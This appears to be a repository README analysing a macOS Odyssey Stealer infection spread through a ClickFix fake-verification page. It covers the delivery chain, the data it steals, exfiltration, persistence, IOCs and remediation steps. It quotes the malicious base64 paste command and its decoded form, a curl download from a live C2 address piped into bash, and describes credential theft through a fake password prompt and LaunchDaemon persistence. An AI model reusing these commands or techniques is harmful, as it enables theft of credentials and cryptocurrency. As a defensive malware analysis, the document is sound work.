This repository contains an analysis of a macOS infostealer delivered via a ClickFix social engineering attack hosted on testdino.com. The malware is an instance of Odyssey Stealer (a rebrand of Poseidon Stealer, itself a fork of AMOS/Atomic Stealer) -- a sophisticated macOS credential and cryptocurrency theft tool distributed as Malware-as-a-Service (MaaS) by a Russian-speaking threat actor known as "Rodrigo."
The victim was tricked into pasting a malicious command into their macOS Terminal through a fake CAPTCHA verification page.
The attack originates from https://testdino.com, which presents a fake security verification page mimicking Cloudflare's "Just a moment..." interstitial. The page:
- Displays a fake "Complete the verification" prompt
- Instructs the user to open Terminal (Cmd+Space -> "Terminal")
- Provides a "Copy" button with a base64-encoded malicious command
- Tells the user to paste it into Terminal and press Return
The malicious payload is served dynamically through an API endpoint:
https://testdino.com/api/page/active?os=macos&domain=testdino.com
This endpoint returns platform-specific payloads for macOS, Windows, and a display command, allowing the attackers to target multiple operating systems from a single phishing page.
Step 1 - User pastes the command:
echo "Y3VybCAtcyBodHRwOi8vNzcuOTAuMTg1LjI0L2Qvcm9iZXJ0bzI2OTgyIHwgbm9odXAgYmFzaCAm" | base64 -d | bash
Step 2 - Decoded command:
curl -s http://77.90.185.24/d/roberto26982 | nohup bash &
This silently downloads the main malware payload from the C2 server and executes it in the background using nohup (so it persists even if the terminal is closed).
Step 3 - Callback verification:
After executing the payload, the command also pings a verification URL to confirm successful infection:
https://dildobegins.ink/api/verify?token=7f3cceade17ae06a16c156ca81e4196397cb671465d21c5f8ac13928eb2b9402
The API endpoint reveals multiple C2 servers serving different builds:
| Platform | C2 Server | Build ID |
|---|---|---|
| macOS | http://77.90.185.24 |
roberto26982 |
| Windows | http://213.209.159.175 |
roberto34036 |
| Display (screenshot) | http://185.11.61.84 |
roberto22134 |
File: roberto26982
Type: ASCII text (single-line obfuscated AppleScript executed via osascript -e)
Size: 50,862 bytes
MD5: e92ea9629e601141c2f4e7de80a6bb5d
SHA256: df5aa9a7e36f5b54c1c6f6f9c38d86b070eafbb02760a8133568d035d5ca35a1
The script is a massive one-liner that invokes osascript -e 'run script ...' containing an obfuscated AppleScript with randomized function and variable names (e.g., f9045185332467140346, v2764062242094160557).
Hardcoded values extracted from the malware:
Build ID: 00f0e61901a347e4b4ff82a3bfc2e21a
C2 Server: http://77.90.185.24
Username: roberto
Steal Notes: true
Steal Finder: true
Steal History: false
The malware displays a fake macOS authentication dialog:
"System Helper requires authorization. Please provide your device password to proceed with verification."
It loops indefinitely until the user enters the correct password, which it validates using dscl . authonly. The password is then used to:
- Extract Chrome's master password from Keychain (
security find-generic-password -ga "Chrome") - Execute privileged operations via
sudo
Chromium-based browsers targeted:
- Google Chrome, Chrome Beta, Chrome Canary, Chrome Dev
- Brave Browser
- Microsoft Edge
- Vivaldi
- Opera, OperaGX
- Arc
- CocCoc
- Chromium
Data stolen per browser profile:
- Cookies (including Network/Cookies)
- Login Data (saved passwords)
- Web Data (autofill, payment info)
- Local Extension Settings
- IndexedDB data
Gecko-based browsers targeted:
- Mozilla Firefox
- Waterfox
Data stolen:
cookies.sqliteformhistory.sqlitekey4.db(master password database)logins.json- MetaMask extension data from Firefox container storage
Desktop wallet applications targeted:
- Electrum
- Coinomi
- Exodus
- Atomic Wallet
- Wasabi Wallet
- Ledger Live
- Monero
- Bitcoin Core
- Litecoin Core
- Dash Core
- Electrum-LTC
- Electron Cash
- Guarda
- Dogecoin Core
- Trezor Suite
- Sparrow Wallet
- Binance (app-store.json)
- TonKeeper (config.json)
Browser extensions targeted: 150+ cryptocurrency and authentication extensions including MetaMask, and many others identified by Chrome extension IDs.
- Safari cookies (
Cookies.binarycookiesfrom multiple locations) - Safari Form Values (autofill data)
- Apple Notes (NoteStore.sqlite + WAL/SHM files, and optionally the full note content exported as HTML)
- macOS Keychain (
login.keychain-dband UUID-based keychain folder) - Desktop & Documents files (files matching configured extensions, up to 10MB)
- Notes media attachments (images/files attached to notes, up to 12MB)
The malware copies Telegram Desktop session data:
tdata/key_datas- All session storage directories and their map files
- Hardware UUID via
system_profiler SPHardwareDataType - Full system profile:
SPSoftwareDataType,SPHardwareDataType,SPDisplaysDataType - List of all installed applications in
/Applications - Current macOS username
All stolen data is staged to a random /tmp/<random>/ directory, then compressed:
ditto -c -k --sequesterRsrc /tmp/<random>/ /tmp/out.zip
Exfiltrated via HTTP POST to http://77.90.185.24/log with headers:
buildid: 00f0e61901a347e4b4ff82a3bfc2e21a
username: roberto
repeat: false
The upload retries up to 10 times with 60-second delays on failure.
After data exfiltration, if the user's password was captured, the malware:
- Downloads trojanized versions of Ledger Live, Ledger Wallet, and Trezor Suite from the C2
- Kills the legitimate application process
- Uses
sudo rm -rto delete the real application - Extracts the trojanized version into
/Applications
These trojanized apps are designed to steal seed/recovery phrases.
The malware creates a LaunchDaemon for persistence:
- Generates a random label:
com.<random_number> - Writes a plist to
/tmp/starter - Copies it to
/Library/LaunchDaemons/com.<random>.plistusing sudo - Bootstraps it with
launchctl bootstrap system - Falls back to
nohupexecution if the LaunchDaemon installation fails
The persistent payload contains a second-stage obfuscated AppleScript that:
- Registers with the C2 via
/api/v1/bot/joinsystem/ - Polls for commands via
/api/v1/bot/actions/ - Supports commands:
uninstall,repeat(re-run steal),doshell(arbitrary shell execution),enablesocks5(SOCKS5 proxy) - Writes an uninstall marker to
~/.uninstalledif told to self-destruct
| Type | Value | Description |
|---|---|---|
| IP | 77.90.185.24 |
Primary macOS C2 server |
| IP | 213.209.159.175 |
Windows C2 server |
| IP | 185.11.61.84 |
Secondary C2 server |
| Domain | dildobegins.ink |
Infection verification callback |
| Domain | testdino.com |
Phishing/ClickFix page |
| URL | http://77.90.185.24/d/roberto26982 |
macOS payload URL |
| URL | http://77.90.185.24/log |
Data exfiltration endpoint |
| URL | http://77.90.185.24/api/v1/bot/joinsystem/ |
Bot registration endpoint |
| URL | http://77.90.185.24/api/v1/bot/actions/ |
Bot command polling endpoint |
| URL | http://77.90.185.24/otherassets/ledger.zip |
Trojanized Ledger Live |
| URL | http://77.90.185.24/otherassets/trezor.zip |
Trojanized Trezor Suite |
| URL | http://77.90.185.24/otherassets/socks |
SOCKS5 proxy binary |
| Type | Value | Description |
|---|---|---|
| MD5 | e92ea9629e601141c2f4e7de80a6bb5d |
Main payload hash |
| SHA256 | df5aa9a7e36f5b54c1c6f6f9c38d86b070eafbb02760a8133568d035d5ca35a1 |
Main payload hash |
| Build ID | 00f0e61901a347e4b4ff82a3bfc2e21a |
Campaign identifier |
| Path | Description |
|---|---|
/Library/LaunchDaemons/com.<random>.plist |
Persistence mechanism |
/tmp/out.zip |
Staged exfiltration archive |
/tmp/starter |
Temporary LaunchDaemon plist |
/tmp/socks |
SOCKS5 proxy binary |
~/.username |
Stored attacker username |
~/.chost |
Stored C2 URL |
~/.botid |
Bot registration ID |
~/.lastaction |
Last C2 action timestamp |
~/.pwd |
Cached stolen password |
~/.uninstalled |
Uninstall marker |
Yes, this is part of a widespread and well-documented campaign. Odyssey Stealer (and its predecessors AMOS/Poseidon) represent one of the most active macOS threat families in 2025-2026:
- Palo Alto Unit42 reported a 101% increase in macOS infostealers between the last two quarters of 2024, with Atomic/Poseidon/Odyssey being the dominant family.
- Forcepoint X-Labs published the initial Odyssey Stealer analysis in August 2025, documenting a campaign impersonating TradingView.
- CloudSEK discovered Microsoft Teams impersonation campaigns using the same ClickFix technique (December 2025).
- CYFIRMA published a detailed technical analysis revealing the malware's control panel and Russian-hosted infrastructure.
- Red Canary wrote a guide for distinguishing Atomic, Odyssey, and Poseidon stealers on macOS.
- Malwarebytes reported AMOS and Lumma stealers actively spreading on Reddit through crypto and trading subreddits.
- Huntress documented an AI-poisoned search result attack in December 2025 where victims ran AMOS after following instructions from a ChatGPT conversation found via Google Search.
- SC Media reported 85+ Google Ads-promoted domains spoofing Homebrew, LogMeIn, and TradingView to deliver AMOS and Odyssey.
- The Hacker News reported on the Crazy Evil Gang, a Russian-speaking group using AMOS and other stealers for cryptocurrency theft via social media scams.
ClickFix has become one of the most widely used initial access methods, accounting for 47% of attacks observed by Microsoft in recent threat reports.
If your friend (or anyone) executed this command, they should assume full compromise and take immediate action:
- Disconnect from the internet to stop ongoing data exfiltration
- Do NOT enter passwords into any prompts -- the malware will loop a fake auth dialog
- Force-quit Terminal and any suspicious processes
- Change ALL passwords -- especially:
- Apple ID / iCloud
- Email accounts
- Banking and financial services
- Every account saved in any browser
- Revoke all active browser sessions (Google, GitHub, social media, etc.)
- Enable/reset 2FA on all accounts using a fresh authenticator app
- Move cryptocurrency funds immediately from all wallets that were on the machine to new wallets generated on a clean device
- Treat ALL seed phrases/private keys as compromised
- Generate entirely new wallets
- Remove LaunchDaemons: Check
/Library/LaunchDaemons/for anycom.<5-digit-number>.plistfiles - Remove persistence files: Delete
~/.username,~/.chost,~/.botid,~/.lastaction,~/.pwd - Verify applications: Particularly check if Ledger Live, Ledger Wallet, or Trezor Suite were replaced (re-download from official sources)
- Check for SOCKS5 proxy: Remove
/tmp/socksif present - Full OS reinstall is recommended for highest assurance -- the malware had root access if the password was entered
- Monitor financial accounts and crypto wallets for unauthorized transactions
- Check "Have I Been Pwned" and similar services for credential leaks
- Report the incident to relevant authorities and the hosting providers of the C2 infrastructure
- Forcepoint X-Labs: Odyssey Stealer ClickFix Analysis (Aug 2025)
- CloudSEK: Microsoft Teams Impersonation Campaign (Dec 2025)
- CYFIRMA: Odyssey Stealer Technical Analysis (Jul 2025)
- Red Canary: Distinguishing Atomic, Odyssey, and Poseidon Stealers
- Palo Alto Unit42: macOS Stealers on the Rise
- SC Media: Poseidon Stealer Rebranded as Odyssey Stealer (Jun 2025)
- Malwarebytes: AMOS and Lumma Stealers Spread via Reddit (Mar 2025)
- Huntress: AMOS via AI-Poisoned Search Results (Dec 2025)
- The Hacker News: ClickFix Attacks Expand (Jan 2026)
- PCRisk: Odyssey Stealer Removal Guide
- Emsisoft: ClickFix Malware on macOS (Sep 2025)